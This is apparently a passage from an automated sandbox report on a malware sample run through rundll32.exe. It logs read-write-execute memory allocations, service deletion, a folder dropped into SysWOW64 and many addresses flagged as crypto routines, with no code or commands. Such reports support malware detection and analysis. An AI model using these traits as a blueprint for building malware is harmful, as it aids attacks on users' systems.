Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write

Contains functionality to delete services

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 12_2_004AF3A1 DeleteService,

12_2_004AF3A1

Creates files inside the system directory

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Yozs\

Jump to behavior

Detected potential crypto function

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100135DE	7_2_100135DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10019081	7_2_10019081
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000C0D0	7_2_1000C0D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000C228	7_2_1000C228
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000BA3C	7_2_1000BA3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001A30D	7_2_1001A30D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000CB34	7_2_1000CB34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10019B65	7_2_10019B65
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000EB85	7_2_1000EB85
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000D39E	7_2_1000D39E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000E3E0	7_2_1000E3E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1001B4F3	7_2_1001B4F3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_100195F3	7_2_100195F3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000C71C	7_2_1000C71C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000CF69	7_2_1000CF69
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A6005	7_2_001A6005
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B1079	7_2_001B1079
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AE871	7_2_001AE871
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B0065	7_2_001B0065
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B1913	7_2_001B1913
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A510E	7_2_001A510E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B5136	7_2_001B5136
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A415F	7_2_001A415F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B41AD	7_2_001B41AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A2A18	7_2_001A2A18
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A0A00	7_2_001A0A00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B2A00	7_2_001B2A00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B8279	7_2_001B8279
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001ACA68	7_2_001ACA68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A6A6F	7_2_001A6A6F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A628A	7_2_001A628A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001C12B6	7_2_001C12B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B02A0	7_2_001B02A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B6AD5	7_2_001B6AD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AD2C9	7_2_001AD2C9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A8B16	7_2_001A8B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AFB05	7_2_001AFB05
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A8355	7_2_001A8355
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B4B48	7_2_001B4B48
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A1B46	7_2_001A1B46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B2B45	7_2_001B2B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AE380	7_2_001AE380
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AF3B5	7_2_001AF3B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A33AB	7_2_001A33AB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A5BAC	7_2_001A5BAC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AABF8	7_2_001AABF8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B9BE4	7_2_001B9BE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A3C28	7_2_001A3C28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A7C4A	7_2_001A7C4A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AC44B	7_2_001AC44B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B4460	7_2_001B4460
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AE499	7_2_001AE499
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B9494	7_2_001B9494
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001BC48F	7_2_001BC48F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001ABCA5	7_2_001ABCA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B5CCB	7_2_001B5CCB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AA4E1	7_2_001AA4E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A6D2C	7_2_001A6D2C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A3521	7_2_001A3521
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001ADD24	7_2_001ADD24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001BBD5E	7_2_001BBD5E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B7D78	7_2_001B7D78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001BB59B	7_2_001BB59B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001BA59F	7_2_001BA59F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A7D94	7_2_001A7D94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A4DB8	7_2_001A4DB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A75A0	7_2_001A75A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B2DE1	7_2_001B2DE1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001C1600	7_2_001C1600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B6E50	7_2_001B6E50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A367A	7_2_001A367A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B1E7D	7_2_001B1E7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A5EBA	7_2_001A5EBA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A06B6	7_2_001A06B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B66AE	7_2_001B66AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B06D1	7_2_001B06D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AC6CE	7_2_001AC6CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B96EA	7_2_001B96EA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B8EE2	7_2_001B8EE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A6EE4	7_2_001A6EE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B7713	7_2_001B7713
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AEF04	7_2_001AEF04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B473C	7_2_001B473C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AAF28	7_2_001AAF28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001ACF5B	7_2_001ACF5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A5742	7_2_001A5742
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AD760	7_2_001AD760
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B4F60	7_2_001B4F60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A2F97	7_2_001A2F97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001BBFB0	7_2_001BBFB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AA7A2	7_2_001AA7A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001AB7C2	7_2_001AB7C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A77F0	7_2_001A77F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001A27F4	7_2_001A27F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C6C05	9_2_001C6C05
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C6E8A	9_2_001C6E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C9716	9_2_001C9716
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CFB04	9_2_001CFB04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D533C	9_2_001D533C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C4121	9_2_001C4121
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D5748	9_2_001D5748
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CE360	9_2_001CE360
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001DC19B	9_2_001DC19B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D4DAD	9_2_001D4DAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C83F0	9_2_001C83F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001DA7E4	9_2_001DA7E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C3618	9_2_001C3618
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C1600	9_2_001C1600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D3600	9_2_001D3600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C4828	9_2_001C4828
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D7A50	9_2_001D7A50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C884A	9_2_001C884A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CD04B	9_2_001CD04B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D2A7D	9_2_001D2A7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D1C79	9_2_001D1C79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D8E79	9_2_001D8E79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C427A	9_2_001C427A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CF471	9_2_001CF471
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C766F	9_2_001C766F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CD668	9_2_001CD668
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D0C65	9_2_001D0C65
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D5060	9_2_001D5060
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CF099	9_2_001CF099
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001DA094	9_2_001DA094
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001DD08F	9_2_001DD08F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C6ABA	9_2_001C6ABA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C12B6	9_2_001C12B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D72AE	9_2_001D72AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CC8A5	9_2_001CC8A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D0EA0	9_2_001D0EA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D76D5	9_2_001D76D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D12D1	9_2_001D12D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CD2CE	9_2_001CD2CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CDEC9	9_2_001CDEC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D68CB	9_2_001D68CB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001DA2EA	9_2_001DA2EA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C7AE4	9_2_001C7AE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CB0E1	9_2_001CB0E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D9AE2	9_2_001D9AE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D8313	9_2_001D8313
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D2513	9_2_001D2513
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C5D0E	9_2_001C5D0E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D0705	9_2_001D0705
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D5D36	9_2_001D5D36
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C792C	9_2_001C792C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CBB28	9_2_001CBB28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CE924	9_2_001CE924
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001DC95E	9_2_001DC95E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C4D5F	9_2_001C4D5F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CDB5B	9_2_001CDB5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C8F55	9_2_001C8F55
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D3745	9_2_001D3745
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C2746	9_2_001C2746
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C6342	9_2_001C6342
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D8978	9_2_001D8978
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D5B60	9_2_001D5B60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001DB19F	9_2_001DB19F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C8994	9_2_001C8994
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C3B97	9_2_001C3B97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CEF80	9_2_001CEF80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C59B8	9_2_001C59B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CFFB5	9_2_001CFFB5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001DCBB0	9_2_001DCBB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C67AC	9_2_001C67AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C3FAB	9_2_001C3FAB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C81A0	9_2_001C81A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CB3A2	9_2_001CB3A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CC3C2	9_2_001CC3C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001CB7F8	9_2_001CB7F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C33F4	9_2_001C33F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D39E1	9_2_001D39E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001E6005	10_2_001E6005
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001E3C28	10_2_001E3C28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001E7C4A	10_2_001E7C4A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001EC44B	10_2_001EC44B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F1079	10_2_001F1079
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001EE871	10_2_001EE871
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F0065	10_2_001F0065
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F4460	10_2_001F4460
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001EE499	10_2_001EE499
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F9494	10_2_001F9494
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FC48F	10_2_001FC48F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001EBCA5	10_2_001EBCA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F5CCB	10_2_001F5CCB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001EA4E1	10_2_001EA4E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F1913	10_2_001F1913
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001E510E	10_2_001E510E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F5136	10_2_001F5136
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001E6D2C	10_2_001E6D2C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001EDD24	10_2_001EDD24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001E3521	10_2_001E3521
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FBD5E	10_2_001FBD5E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001E415F	10_2_001E415F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F7D78	10_2_001F7D78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FA59F	10_2_001FA59F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FB59B	10_2_001FB59B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001E7D94	10_2_001E7D94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001E4DB8	10_2_001E4DB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F41AD	10_2_001F41AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001E75A0	10_2_001E75A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F2DE1	10_2_001F2DE1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001E2A18	10_2_001E2A18
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001E0A00	10_2_001E0A00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F2A00	10_2_001F2A00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00201600	10_2_00201600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F6E50	10_2_001F6E50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F1E7D	10_2_001F1E7D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001E367A	10_2_001E367A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F8279	10_2_001F8279
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001E6A6F	10_2_001E6A6F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001ECA68	10_2_001ECA68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001E628A	10_2_001E628A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_002012B6	10_2_002012B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001E5EBA	10_2_001E5EBA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001E06B6	10_2_001E06B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F66AE	10_2_001F66AE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F02A0	10_2_001F02A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F6AD5	10_2_001F6AD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F06D1	10_2_001F06D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001EC6CE	10_2_001EC6CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001ED2C9	10_2_001ED2C9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F96EA	10_2_001F96EA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001E6EE4	10_2_001E6EE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F8EE2	10_2_001F8EE2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001E8B16	10_2_001E8B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F7713	10_2_001F7713
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001EEF04	10_2_001EEF04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001EFB05	10_2_001EFB05
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F473C	10_2_001F473C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001EAF28	10_2_001EAF28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001ECF5B	10_2_001ECF5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001E8355	10_2_001E8355
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F4B48	10_2_001F4B48
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001E1B46	10_2_001E1B46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F2B45	10_2_001F2B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001E5742	10_2_001E5742
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001ED760	10_2_001ED760
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F4F60	10_2_001F4F60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001E2F97	10_2_001E2F97
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001EE380	10_2_001EE380
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001EF3B5	10_2_001EF3B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FBFB0	10_2_001FBFB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001E5BAC	10_2_001E5BAC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001E33AB	10_2_001E33AB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001EA7A2	10_2_001EA7A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001EB7C2	10_2_001EB7C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001EABF8	10_2_001EABF8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001E27F4	10_2_001E27F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001E77F0	10_2_001E77F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F9BE4	10_2_001F9BE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F3C28	11_2_002F3C28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F6005	11_2_002F6005
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00301079	11_2_00301079
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00304460	11_2_00304460
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00300065	11_2_00300065
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002FE871	11_2_002FE871
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002FC44B	11_2_002FC44B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F7C4A	11_2_002F7C4A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002FBCA5	11_2_002FBCA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00309494	11_2_00309494
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002FE499	11_2_002FE499
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0030C48F	11_2_0030C48F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002FA4E1	11_2_002FA4E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00305CCB	11_2_00305CCB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F6D2C	11_2_002F6D2C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00305136	11_2_00305136
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002FDD24	11_2_002FDD24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F3521	11_2_002F3521
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F510E	11_2_002F510E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00301913	11_2_00301913
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00307D78	11_2_00307D78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0030BD5E	11_2_0030BD5E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F415F	11_2_002F415F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F75A0	11_2_002F75A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F4DB8	11_2_002F4DB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003041AD	11_2_003041AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0030B59B	11_2_0030B59B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0030A59F	11_2_0030A59F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F7D94	11_2_002F7D94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00302DE1	11_2_00302DE1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F0A00	11_2_002F0A00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00302A00	11_2_00302A00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00311600	11_2_00311600
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F2A18	11_2_002F2A18
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002F6A6F	11_2_002F6A6F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_002FCA68	11_2_002FCA68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00308279	11_2_00308279
